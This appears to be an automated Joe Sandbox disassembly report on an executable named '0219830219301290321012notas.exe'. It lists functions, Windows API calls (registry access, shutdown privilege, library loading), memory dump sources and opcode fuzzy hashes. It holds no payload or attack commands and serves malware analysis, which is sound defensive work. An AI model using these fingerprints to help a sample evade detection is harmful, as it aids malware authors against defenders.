                                                                    • Instruction Fuzzy Hash: CB1172B1650708BAD560FB70CC0BFCB779C6F04700F408C15B29A66162D7A4F6259E54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00239CE5 Relevance: 9.3, APIs: 6, Instructions: 319fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32 ref: 00239D2D
                                                                    • __fassign.LIBCMT ref: 00239F0C
                                                                    • __fassign.LIBCMT ref: 00239F29
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00239F71
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00239FB1
                                                                    • GetLastError.KERNEL32 ref: 0023A05D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                    • String ID:
                                                                    • API String ID: 4031098158-0
                                                                    • Opcode ID: b366d7bc1c0f0b190f9d56b2456fea9b9ef0a359f8949beda9250d44909c0b38
                                                                    • Instruction ID: dc1ecffccbdaab4c0fb8c869a63468b630ff7b2d910737b3333853f089fffef2
                                                                    • Opcode Fuzzy Hash: b366d7bc1c0f0b190f9d56b2456fea9b9ef0a359f8949beda9250d44909c0b38
                                                                    • Instruction Fuzzy Hash: 18D1CEB5D102589FCF15CFA8D880AEDBBB5FF09304F24416AE855FB241D6319A56CF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0022C4AC Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,0022C4A3,0022B3E4), ref: 0022C4BA
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0022C4C8
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0022C4E1
                                                                    • SetLastError.KERNEL32(00000000,?,0022C4A3,0022B3E4), ref: 0022C533
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 66a9c25f734cee0b4c299077c902512f7e5bead4d2337ac3ffd0cc2d7820a956
                                                                    • Instruction ID: fa1eb16abd3021c4b01da667c38c44d9292d7725744eaf301e82c94277f26813
                                                                    • Opcode Fuzzy Hash: 66a9c25f734cee0b4c299077c902512f7e5bead4d2337ac3ffd0cc2d7820a956
                                                                    • Instruction Fuzzy Hash: 18012477A783327EB6242EF47C8977B2A98DB063787B0022AF410590F2EF919C309550
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0022798F Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 165COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00221BDC: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,0022100A), ref: 00221BE2
                                                                      • Part of subcall function 00221BDC: GetLastError.KERNEL32(?,00000000,00000000,?,0022100A), ref: 00221BEC
                                                                    • GetModuleFileNameW.KERNEL32(00220000,?,00000104), ref: 00227A4C
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00227AA0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: Module$CriticalErrorFileHandleInitializeLastNameSection
                                                                    • String ID: Module$Module_Raw$REGISTRY
                                                                    • API String ID: 3798416324-549000027
                                                                    • Opcode ID: 6c13afe4350060c74615b4ab7fafd6ccbc52589c76a199688574efeb3212c95e
                                                                    • Instruction ID: 8d9971cfb1d44aa9f407704367613112a4b76d6f92194c1d81bb4614292e22c4
                                                                    • Opcode Fuzzy Hash: 6c13afe4350060c74615b4ab7fafd6ccbc52589c76a199688574efeb3212c95e
                                                                    • Instruction Fuzzy Hash: 3A51D775A18339ABDB24DFA4EC40EEE73B8AF45310F0440A9E90693541EB31AFA4CF51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00221D9C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41registrylibraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,00221E33,00000000,00020019,?,?,00000000,?,?,?,?,?,00221195), ref: 00221DAE
                                                                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00221DBE
                                                                    • RegOpenKeyExW.ADVAPI32(00000000,00020019,00000000,80000002,00221195,?,?,?,00221E33,00000000,00020019,?,?,00000000), ref: 00221DEE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleOpenProc
                                                                    • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                    • API String ID: 1337834000-3913318428
                                                                    • Opcode ID: 86c57d3c077e2b5173e4d49dcc35de226519bd6e17a6fd87ca2d5399b18e436d
                                                                    • Instruction ID: 6b843f652f77814c45115c6faf914b6f336de5022d0182380d1671ccfbd50a2a
                                                                    • Opcode Fuzzy Hash: 86c57d3c077e2b5173e4d49dcc35de226519bd6e17a6fd87ca2d5399b18e436d
                                                                    • Instruction Fuzzy Hash: CAF04F3A52011AFBCF251FE5FD08D9B3F79EF96B917004429FA4990020CB728971EBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00221A3F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(comctl32.dll,00000000,00000001,?,?,00221816,00000000), ref: 00221A5D
                                                                    • GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 00221A6F
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00221816,00000000), ref: 00221A86
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: TaskDialogIndirect$comctl32.dll
                                                                    • API String ID: 145871493-2809879075
                                                                    • Opcode ID: b1373d0a0a2583ba4a185b54d5e2f8ce4bac6cb573b97aac9880b5fe9c65ffe5
                                                                    • Instruction ID: 59a252404a0209b73e6bfd8997e3da6370f2d67f2ec7d4e983eeb3d3e0d0bb37
                                                                    • Opcode Fuzzy Hash: b1373d0a0a2583ba4a185b54d5e2f8ce4bac6cb573b97aac9880b5fe9c65ffe5
                                                                    • Instruction Fuzzy Hash: D6F08235B12625BBD3205B68BD48F6ABB98EF55B20F008135F908D6242D7A49C20C6E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002315C6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,002315BB,?,?,00231583,?,?,?), ref: 002315DB
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002315EE
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,002315BB,?,?,00231583,?,?,?), ref: 00231611
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 12c9997ee5f636c6db1a68cf58730b872d4fd0bc0ce92f42ffde63149e2724d7
                                                                    • Instruction ID: 7999e5c4cb549fd810d89d7688d4c93226d6a7d172b37c788ef03854dea7fff5
                                                                    • Opcode Fuzzy Hash: 12c9997ee5f636c6db1a68cf58730b872d4fd0bc0ce92f42ffde63149e2724d7
                                                                    • Instruction Fuzzy Hash: 0BF05E35925218FBDB259B90FE0EFADBA68EB01712F040060A944A2160CB714E20EEA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00231D83 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00231DA1
                                                                    • _free.LIBCMT ref: 00231DC1
                                                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00231E22
                                                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00231E34
                                                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00231E41
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: __crt_fast_encode_pointer$_free
                                                                    • String ID:
                                                                    • API String ID: 366466260-0
                                                                    • Opcode ID: 404019e1ee56dbfb86ea7d1f49a28038e925714ae5c7957e7dda6a85bda80712
                                                                    • Instruction ID: 034a15f7a9551862784f74cfc89898814684c1aab4411d5d913c3a845264d4e1
                                                                    • Opcode Fuzzy Hash: 404019e1ee56dbfb86ea7d1f49a28038e925714ae5c7957e7dda6a85bda80712
                                                                    • Instruction Fuzzy Hash: EF31D6B5A10204AFCB14DF68CC41AADB7B6EF85714F2485A9E515EB391DB31EE22CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00236CB4 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00236CCC
                                                                      • Part of subcall function 0023363A: HeapFree.KERNEL32(00000000,00000000,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?), ref: 00233650
                                                                      • Part of subcall function 0023363A: GetLastError.KERNEL32(?,?,00236D47,?,00000000,?,?,?,00236D6E,?,00000007,?,?,002371E8,?,?), ref: 00233662
                                                                    • _free.LIBCMT ref: 00236CDE
                                                                    • _free.LIBCMT ref: 00236CF0
                                                                    • _free.LIBCMT ref: 00236D02
                                                                    • _free.LIBCMT ref: 00236D14
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 2312496c641a60eb6ed6f4794908e508c1afb444474788eb0228e27945cb52e3
                                                                    • Instruction ID: 6fa514c5b2dd5a663303faa62b498c4fa4203f7954237c173260cfcbd1c3f395
                                                                    • Opcode Fuzzy Hash: 2312496c641a60eb6ed6f4794908e508c1afb444474788eb0228e27945cb52e3
                                                                    • Instruction Fuzzy Hash: 03F04FB2560205BB8621DF58FA8EC0AB3EDFB01724B658806F058D7610CA74FDA08E68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0023169A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: C:\Users\user\Desktop\0219830219301290321012notas.exe
                                                                    • API String ID: 0-1787834505
                                                                    • Opcode ID: 61b63551cc6dcb3736e2493fb48d3922440244dbe93f40e0afe991e25a1b3c0d
                                                                    • Instruction ID: a92045c94964e2ceedd8312625d8a59d396ad948a665a64a2206e33b772f76b8
                                                                    • Opcode Fuzzy Hash: 61b63551cc6dcb3736e2493fb48d3922440244dbe93f40e0afe991e25a1b3c0d
                                                                    • Instruction Fuzzy Hash: F8415FB5A20215ABDB22DF99EC85DAEFBB8EB89710F144066F40597211D7B08E70DF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00228399 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 002283CC
                                                                    • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 002283DC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                    • API String ID: 1646373207-2994018265
                                                                    • Opcode ID: b690e33e149484fca29c2027184fc4bc9ea7a9ed3102b58da7e915faec218736
                                                                    • Instruction ID: ff60fc49c4654de1d3ff261815f2dbcbf8af3b020f69d4e2e7fd8ed8b383b8e1
                                                                    • Opcode Fuzzy Hash: b690e33e149484fca29c2027184fc4bc9ea7a9ed3102b58da7e915faec218736
                                                                    • Instruction Fuzzy Hash: E5215EB5A21216BFEB18EFA4EC45EBBB7B8EB98700B00841DB51692141DB709925CB60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002218D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,0022182D,00000000), ref: 0022190C
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,0022182D,00000000), ref: 00221913
                                                                    • CloseHandle.KERNEL32(?), ref: 00221950
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCurrentHandleOpenToken
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 4052875653-3733053543
                                                                    • Opcode ID: 163898efef74a2ade6f180bb844151bf26bbaceac58852f3ebf913e72797ce6f
                                                                    • Instruction ID: 018d1032f44324a3274f73da1ea798394627a384402e5c5a6872c496aaad68bd
                                                                    • Opcode Fuzzy Hash: 163898efef74a2ade6f180bb844151bf26bbaceac58852f3ebf913e72797ce6f
                                                                    • Instruction Fuzzy Hash: D1113675A10229BBDB109FE5ED4DAEEBBB8EF09700F000026E505E6151DB748A548BA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00228BA7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,?,00228AEA,?,?,?,?), ref: 00228BCE
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00228BDE
                                                                      • Part of subcall function 00228B55: GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,00228BBE,?,?,00000000,?,00228AEA,?,?,?,?), ref: 00228B67
                                                                      • Part of subcall function 00228B55: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00228B77
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: Advapi32.dll$RegDeleteKeyExW
                                                                    • API String ID: 1646373207-2191092095
                                                                    • Opcode ID: 4af005b02871a1f78f9912726e15baafab868cc73a3a7d72ee3e0942e50dbb25
                                                                    • Instruction ID: ddc3378621f08d165807f447beec0fb4a068090ca72386a9b97002072fc50877
                                                                    • Opcode Fuzzy Hash: 4af005b02871a1f78f9912726e15baafab868cc73a3a7d72ee3e0942e50dbb25
                                                                    • Instruction Fuzzy Hash: B9018B78126265FFDB265FA8FC48F653BEAAB16341F04441DF54592031CFA2D4A0AB64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00228B55 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,00228BBE,?,?,00000000,?,00228AEA,?,?,?,?), ref: 00228B67
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00228B77
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: Advapi32.dll$RegDeleteKeyTransactedW
                                                                    • API String ID: 1646373207-2168864297
                                                                    • Opcode ID: f6c2ec813a5e937c980ad95602598d8f246a3a04a3154918187b8229dcc8dd87
                                                                    • Instruction ID: d39d137a8a640211c4d7290e05db394a24ce71da7e7320667feccda9116f8530
                                                                    • Opcode Fuzzy Hash: f6c2ec813a5e937c980ad95602598d8f246a3a04a3154918187b8229dcc8dd87
                                                                    • Instruction Fuzzy Hash: ACF08276621215BA97305FEAFE08E6777ADEBC2B65300443EF689C1010DAB1C461DB60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002223D9 Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 002223E3
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000820), ref: 002223EB
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 002223FE
                                                                    • _wcsrchr.LIBVCRUNTIME ref: 0022242D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: Module$FileH_prolog3_HandleName_wcsrchr
                                                                    • String ID:
                                                                    • API String ID: 3248668939-0
                                                                    • Opcode ID: 1a076dccad3499f138fbdcddbbead967c9bbde935317c550b7c10dd3aa7f637d
                                                                    • Instruction ID: 3d6d88bfb7325473bdbb9df75499b6144ef475d1ed15f9396c34cffb247c4a8e
                                                                    • Opcode Fuzzy Hash: 1a076dccad3499f138fbdcddbbead967c9bbde935317c550b7c10dd3aa7f637d
                                                                    • Instruction Fuzzy Hash: 4D51D57591012AEECF24EFA4EC956EAB3B5FB54304F808294E44967150EF715EA9CFC0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002331D2 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,0022179A,?,0022EBD7,0022179A,00000000,?,?,0022EC92,E9800040,00000000,?), ref: 002331D7
                                                                    • _free.LIBCMT ref: 00233234
                                                                    • _free.LIBCMT ref: 0023326A
                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0022EC92,E9800040,00000000,?), ref: 00233275
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    • Opcode ID: 5b4a04503398edad0f967b885bc70d60ac730f526f879911aba61224f3b1eaea
                                                                    • Instruction ID: 33ffed8e311ea84885aebe278a940606c2b0019294c853711ef66ce187ea771f
                                                                    • Opcode Fuzzy Hash: 5b4a04503398edad0f967b885bc70d60ac730f526f879911aba61224f3b1eaea
                                                                    • Instruction Fuzzy Hash: 6011E9F62742026AD611FAB4BC8AD2B265DABD2778F250224F53C961E2DE60CF345D10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00222304 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003), ref: 00222373
                                                                    • VerSetConditionMask.KERNEL32(00000000), ref: 00222377
                                                                    • VerSetConditionMask.KERNEL32(00000000), ref: 0022237B
                                                                    • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0022239E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
